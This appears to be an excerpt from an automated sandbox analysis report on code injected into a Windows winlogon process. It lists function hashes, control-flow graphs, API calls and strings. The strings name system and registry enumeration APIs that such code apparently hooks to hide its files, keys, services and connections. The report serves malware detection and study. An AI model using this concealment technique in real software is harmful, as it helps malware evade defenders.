                                                                                • Instruction ID: 9367effade6da1e612e9811c82477e14b03a08a888ac1948d4cbee7ffa7af72d
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: F41152716346C2C2FB60AB62F8493DDF294BF54385F90413FAD4E82995EF7CC0849A10
                                                                                Function 000001E858984DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 3733156554-0
                                                                                • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                                • Instruction ID: 5a9e8cf37d9f90f00b28642c3c3ed99c7679eb8f6b8d0d5ae9ec7e4d6c0d13b2
                                                                                • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                                • Instruction Fuzzy Hash: DFF01D76228B85C1D630DB51E44038EBBA0FB887D4F140122BE8D43B69CE3CC5808F00
                                                                                Function 000001E85895273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 265 1e85895273c-1e8589527a4 call 1e8589529d4 * 4 274 1e8589527aa-1e8589527ad 265->274 275 1e8589529b2 265->275 274->275 276 1e8589527b3-1e8589527b6 274->276 277 1e8589529b4-1e8589529d0 275->277 276->275 278 1e8589527bc-1e8589527bf 276->278 278->275 279 1e8589527c5-1e8589527e6 VirtualAlloc 278->279 279->275 280 1e8589527ec-1e85895280c 279->280 281 1e85895280e-1e858952836 280->281 282 1e858952838-1e85895283f 280->282 281->281 281->282 283 1e8589528df-1e8589528e6 282->283 284 1e858952845-1e858952852 282->284 285 1e8589528ec-1e858952901 283->285 286 1e858952992-1e8589529b0 283->286 284->283 287 1e858952858-1e85895286a LoadLibraryA 284->287 285->286 288 1e858952907 285->288 286->277 289 1e85895286c-1e858952878 287->289 290 1e8589528ca-1e8589528d2 287->290 293 1e85895290d-1e858952921 288->293 294 1e8589528c5-1e8589528c8 289->294 290->287 291 1e8589528d4-1e8589528d9 290->291 291->283 296 1e858952923-1e858952934 293->296 297 1e858952982-1e85895298c 293->297 294->290 295 1e85895287a-1e85895287d 294->295 301 1e85895287f-1e8589528a5 295->301 302 1e8589528a7-1e8589528b7 295->302 299 1e85895293f-1e858952943 296->299 300 1e858952936-1e85895293d 296->300 297->286 297->293 304 1e85895294d-1e858952951 299->304 305 1e858952945-1e85895294b 299->305 303 1e858952970-1e858952980 300->303 306 1e8589528ba-1e8589528c1 301->306 302->306 303->296 303->297 308 1e858952963-1e858952967 304->308 309 1e858952953-1e858952961 304->309 305->303 306->294 308->303 310 1e858952969-1e85895296c 308->310 309->303 310->303
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309693197.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: AllocLibraryLoadVirtual
                                                                                • String ID:
                                                                                • API String ID: 3550616410-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: 664efa2306450b3d651c980b7901db96b5cccce9d6076fff7dea8f6b8d110b4a
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: 3261CC72B21690C7DA548F95D1207ADF3A2FF54BA5F588132DE5D07788DE38D852C700
                                                                                Function 000001E858981ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 000001E858981628: GetProcessHeap.KERNEL32 ref: 000001E858981633
                                                                                  • Part of subcall function 000001E858981628: HeapAlloc.KERNEL32 ref: 000001E858981642
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589816B2
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589816DF
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589816F9
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981719
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981734
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981754
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E85898176F
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E85898178F
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589817AA
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589817CA
                                                                                • Sleep.KERNEL32 ref: 000001E858981AD7
                                                                                • SleepEx.KERNELBASE ref: 000001E858981ADD
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589817E5
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981805
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981820
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E858981840
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E85898185B
                                                                                  • Part of subcall function 000001E858981628: RegOpenKeyExW.ADVAPI32 ref: 000001E85898187B
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E858981896
                                                                                  • Part of subcall function 000001E858981628: RegCloseKey.ADVAPI32 ref: 000001E8589818A0
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: 4bfe8da4bf64d09d75688e0bc86698689cfa1098149370d4ad6d534f2979ed62
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: D7317771231AC2D6EB50BB26DA513FDF3A9AF84BD0F0454339E0D87699FE24C8918A10
                                                                                Function 000001E8589B273C Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 350 1e8589b273c-1e8589b27a4 call 1e8589b29d4 * 4 359 1e8589b29b2 350->359 360 1e8589b27aa-1e8589b27ad 350->360 362 1e8589b29b4-1e8589b29d0 359->362 360->359 361 1e8589b27b3-1e8589b27b6 360->361 361->359 363 1e8589b27bc-1e8589b27bf 361->363 363->359 364 1e8589b27c5-1e8589b27e6 VirtualAlloc 363->364 364->359 365 1e8589b27ec-1e8589b280c 364->365 366 1e8589b2838-1e8589b283f 365->366 367 1e8589b280e-1e8589b2836 365->367 368 1e8589b2845-1e8589b2852 366->368 369 1e8589b28df-1e8589b28e6 366->369 367->366 367->367 368->369 372 1e8589b2858-1e8589b286a 368->372 370 1e8589b2992-1e8589b29b0 369->370 371 1e8589b28ec-1e8589b2901 369->371 370->362 371->370 373 1e8589b2907 371->373 379 1e8589b28ca-1e8589b28d2 372->379 380 1e8589b286c-1e8589b2878 372->380 375 1e8589b290d-1e8589b2921 373->375 377 1e8589b2923-1e8589b2934 375->377 378 1e8589b2982-1e8589b298c 375->378 383 1e8589b2936-1e8589b293d 377->383 384 1e8589b293f-1e8589b2943 377->384 378->370 378->375 379->372 381 1e8589b28d4-1e8589b28d9 379->381 385 1e8589b28c5-1e8589b28c8 380->385 381->369 387 1e8589b2970-1e8589b2980 383->387 388 1e8589b2945-1e8589b294b 384->388 389 1e8589b294d-1e8589b2951 384->389 385->379 386 1e8589b287a-1e8589b287d 385->386 390 1e8589b28a7-1e8589b28b7 386->390 391 1e8589b287f-1e8589b28a5 386->391 387->377 387->378 388->387 392 1e8589b2963-1e8589b2967 389->392 393 1e8589b2953-1e8589b2961 389->393 395 1e8589b28ba-1e8589b28c1 390->395 391->395 392->387 394 1e8589b2969-1e8589b296c 392->394 393->387 394->387 395->385
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3310065596.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: c921608bc3ed8dae174af04d789195309c5edfcc0c714fa749226a5546365456
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: 7161DD32B29690CBEB548F95D1007ADF3A2FB54BA5F588136DE5D07788DE38D852C700

                                                                                Non-executed Functions

                                                                                Function 000001E858982B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction ID: 04a661148b50104311287319c74e3cfe1c909468e327bc71e4abbcab7385a8c3
                                                                                • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                • Instruction Fuzzy Hash: A6B15476220AD2C6EB699FA5D8407EDF3A5FB84B84F445027EE0D57B95EE35C880CB40
                                                                                Function 000001E858987D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction ID: c25654e1fbf133ad71a07c6f0efe47fc9d8043adbf42997a59493c9db71f9faa
                                                                                • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                • Instruction Fuzzy Hash: 41313B76225BC1DAEB609F60E8807EDB365FB84744F44442ADA4E57B99EF38C648CB10
                                                                                Function 000001E85898D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction ID: 0fd8bee66b9aa75a719588d4164310d191915e835c40ed0449f42a8a8d7cafff
                                                                                • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                • Instruction Fuzzy Hash: A5313D36224BC1D6EB60DB25E8403EEB3A4FB89754F500126EE9D53B59DF38C555CB00
                                                                                Function 000001E858987960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 2933794660-0
                                                                                • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction ID: 34985af1e6a69c2e887ac8394de09c6f631af6656f7e96728bd996360b5e390c
                                                                                • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction Fuzzy Hash: 7D111C36720F91C9EB109B60E8553AD73A4FB19758F440E32DE6E467A4DF78D1988380
                                                                                Function 000001E85898DCE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                                • Instruction ID: 30bb9f7e9d87a9d9c65bc2380062ff3bad17e1f141d89e57fb0a08f8465aebfb
                                                                                • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                                • Instruction Fuzzy Hash: C551B5327246D1D9FB209B72E8407EEBBA5FB84794F144126EE9D67B95DE38C501CB00
                                                                                Function 000001E8589636F0 Relevance: .0, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309693197.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                                • Instruction ID: 1e72e37fc9f235eb4f944ff72101e8db7dacc5524e3e801771df4715c73e88ad
                                                                                • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                                • Instruction Fuzzy Hash: 1BF0F4716356948EDB988F69E443759B7A1F748384FD0812ADA8EC3A14DB3C8455CF14
                                                                                Function 000001E8589812BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction ID: c2281e23739868d66036d4294d6c0683aafed4b8ecad6af3162b140505f798a1
                                                                                • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                • Instruction Fuzzy Hash: 4E512B36224BC5C6EB65DF62E54439EB7A2FB89BD9F044126DE4A07768EF38C0458B00
                                                                                Function 000001E858981D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309828166.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction ID: eae4a35ccf18d1ff6c879c1ad54c2bd4091f653bf096b8bfe55e41d2011e4d15
                                                                                • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                • Instruction Fuzzy Hash: 35316074130ACBE0EA45EBA9EDA16ECF322FF84344F8050339C1D12565AF788289CB50
                                                                                Function 000001E8589B6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 571 1e8589b6910-1e8589b6916 572 1e8589b6951-1e8589b695b 571->572 573 1e8589b6918-1e8589b691b 571->573 576 1e8589b6a78-1e8589b6a8d 572->576 574 1e8589b6945-1e8589b6984 call 1e8589b6fc0 573->574 575 1e8589b691d-1e8589b6920 573->575 594 1e8589b6a52 574->594 595 1e8589b698a-1e8589b699f call 1e8589b6e54 574->595 577 1e8589b6922-1e8589b6925 575->577 578 1e8589b6938 __scrt_dllmain_crt_thread_attach 575->578 579 1e8589b6a8f 576->579 580 1e8589b6a9c-1e8589b6ab6 call 1e8589b6e54 576->580 582 1e8589b6931-1e8589b6936 call 1e8589b6f04 577->582 583 1e8589b6927-1e8589b6930 577->583 586 1e8589b693d-1e8589b6944 578->586 584 1e8589b6a91-1e8589b6a9b 579->584 592 1e8589b6ab8-1e8589b6aed call 1e8589b6f7c call 1e8589b6e1c call 1e8589b7318 call 1e8589b7130 call 1e8589b7154 call 1e8589b6fac 580->592 593 1e8589b6aef-1e8589b6b20 call 1e8589b7190 580->593 582->586 592->584 605 1e8589b6b22-1e8589b6b28 593->605 606 1e8589b6b31-1e8589b6b37 593->606 599 1e8589b6a54-1e8589b6a69 594->599 603 1e8589b69a5-1e8589b69b6 call 1e8589b6ec4 595->603 604 1e8589b6a6a-1e8589b6a77 call 1e8589b7190 595->604 621 1e8589b6a07-1e8589b6a11 call 1e8589b7130 603->621 622 1e8589b69b8-1e8589b69dc call 1e8589b72dc call 1e8589b6e0c call 1e8589b6e38 call 1e8589bac0c 603->622 604->576 605->606 610 1e8589b6b2a-1e8589b6b2c 605->610 611 1e8589b6b39-1e8589b6b43 606->611 612 1e8589b6b7e-1e8589b6b94 call 1e8589b268c 606->612 617 1e8589b6c1f-1e8589b6c2c 610->617 618 1e8589b6b45-1e8589b6b4d 611->618 619 1e8589b6b4f-1e8589b6b5d call 1e8589c5780 611->619 632 1e8589b6b96-1e8589b6b98 612->632 633 1e8589b6bcc-1e8589b6bce 612->633 624 1e8589b6b63-1e8589b6b78 call 1e8589b6910 618->624 619->624 636 1e8589b6c15-1e8589b6c1d 619->636 621->594 644 1e8589b6a13-1e8589b6a1f call 1e8589b7180 621->644 622->621 674 1e8589b69de-1e8589b69e5 __scrt_dllmain_after_initialize_c 622->674 624->612 624->636 632->633 641 1e8589b6b9a-1e8589b6bbc call 1e8589b268c call 1e8589b6a78 632->641 634 1e8589b6bd0-1e8589b6bd3 633->634 635 1e8589b6bd5-1e8589b6bea call 1e8589b6910 633->635 634->635 634->636 635->636 653 1e8589b6bec-1e8589b6bf6 635->653 636->617 641->633 668 1e8589b6bbe-1e8589b6bc6 call 1e8589c5780 641->668 661 1e8589b6a21-1e8589b6a2b call 1e8589b7098 644->661 662 1e8589b6a45-1e8589b6a50 644->662 658 1e8589b6c01-1e8589b6c11 call 1e8589c5780 653->658 659 1e8589b6bf8-1e8589b6bff 653->659 658->636 659->636 661->662 673 1e8589b6a2d-1e8589b6a3b 661->673 662->599 668->633 673->662 674->621 675 1e8589b69e7-1e8589b6a04 call 1e8589babc8 674->675 675->621
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3310065596.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 5a678c2123d8270ec6fb616ddb0a075a8484000318cf7b7c2c8d3db3c22f7b07
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 2E818B316282C1CEFB92AB65D8413DDF6A0EF85B82F5481379E8D87796DF39E8458700
                                                                                Function 000001E858956910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 464 1e858956910-1e858956916 465 1e858956918-1e85895691b 464->465 466 1e858956951-1e85895695b 464->466 468 1e85895691d-1e858956920 465->468 469 1e858956945-1e858956984 call 1e858956fc0 465->469 467 1e858956a78-1e858956a8d 466->467 470 1e858956a9c-1e858956ab6 call 1e858956e54 467->470 471 1e858956a8f 467->471 473 1e858956938 __scrt_dllmain_crt_thread_attach 468->473 474 1e858956922-1e858956925 468->474 487 1e85895698a-1e85895699f call 1e858956e54 469->487 488 1e858956a52 469->488 485 1e858956aef-1e858956b20 call 1e858957190 470->485 486 1e858956ab8-1e858956aed call 1e858956f7c call 1e858956e1c call 1e858957318 call 1e858957130 call 1e858957154 call 1e858956fac 470->486 477 1e858956a91-1e858956a9b 471->477 479 1e85895693d-1e858956944 473->479 475 1e858956927-1e858956930 474->475 476 1e858956931-1e858956936 call 1e858956f04 474->476 476->479 496 1e858956b31-1e858956b37 485->496 497 1e858956b22-1e858956b28 485->497 486->477 499 1e858956a6a-1e858956a77 call 1e858957190 487->499 500 1e8589569a5-1e8589569b6 call 1e858956ec4 487->500 491 1e858956a54-1e858956a69 488->491 502 1e858956b7e-1e858956b94 call 1e85895268c 496->502 503 1e858956b39-1e858956b43 496->503 497->496 501 1e858956b2a-1e858956b2c 497->501 499->467 514 1e8589569b8-1e8589569dc call 1e8589572dc call 1e858956e0c call 1e858956e38 call 1e85895ac0c 500->514 515 1e858956a07-1e858956a11 call 1e858957130 500->515 509 1e858956c1f-1e858956c2c 501->509 521 1e858956bcc-1e858956bce 502->521 522 1e858956b96-1e858956b98 502->522 510 1e858956b4f-1e858956b5d call 1e858965780 503->510 511 1e858956b45-1e858956b4d 503->511 517 1e858956b63-1e858956b78 call 1e858956910 510->517 532 1e858956c15-1e858956c1d 510->532 511->517 514->515 567 1e8589569de-1e8589569e5 __scrt_dllmain_after_initialize_c 514->567 515->488 535 1e858956a13-1e858956a1f call 1e858957180 515->535 517->502 517->532 530 1e858956bd5-1e858956bea call 1e858956910 521->530 531 1e858956bd0-1e858956bd3 521->531 522->521 529 1e858956b9a-1e858956bbc call 1e85895268c call 1e858956a78 522->529 529->521 561 1e858956bbe-1e858956bc6 call 1e858965780 529->561 530->532 546 1e858956bec-1e858956bf6 530->546 531->530 531->532 532->509 554 1e858956a45-1e858956a50 535->554 555 1e858956a21-1e858956a2b call 1e858957098 535->555 551 1e858956bf8-1e858956bff 546->551 552 1e858956c01-1e858956c11 call 1e858965780 546->552 551->532 552->532 554->491 555->554 566 1e858956a2d-1e858956a3b 555->566 561->521 566->554 567->515 568 1e8589569e7-1e858956a04 call 1e85895abc8 567->568 568->515
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.3309693197.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                • API String ID: 190073905-1786718095
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: dbfcc5e9c0d96a37b9fd7991c7f30359c355952af576fe6994b0ae7cc5e7709f
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: CB817B317352C1CAFA96AB66D8513DDF3A0AF85782F548037AE4D87796DF38C94A8700
                                                                                Function 000001E85898CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32 ref: 000001E85898CE37
                                                                                • FlsGetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE4C
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE6D
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CE9A
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CEAB
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CEBC
                                                                                • SetLastError.KERNEL32 ref: 000001E85898CED7
                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF0D
                                                                                • FlsSetValue.KERNEL32(?,?,00000001,000001E85898ECCC,?,?,?,?,000001E85898BF9F,?,?,?,?,?,000001E858987AB0), ref: 000001E85898CF2C
                                                                                  • Part of subcall function 000001E85898D6CC: HeapAlloc.KERNEL32 ref: 000001E85898D721
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E858990A6B,?,?,?,000001E85899045C,?,?,?,000001E85898C84F), ref: 000001E85898CF54
                                                                                  • Part of subcall function 000001E85898D744: HeapFree.KERNEL32 ref: 000001E85898D75A
